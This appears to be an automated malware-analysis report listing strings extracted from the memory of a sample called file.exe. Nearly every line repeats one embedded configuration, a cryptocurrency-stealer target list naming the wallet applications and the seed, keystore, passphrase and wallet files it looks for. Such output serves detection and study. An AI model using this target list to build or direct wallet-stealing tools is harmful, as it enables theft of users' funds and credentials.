Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RCIIZOAMem.exeneer\AppData\Roaming\Binance\.finger-print.fpcr
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 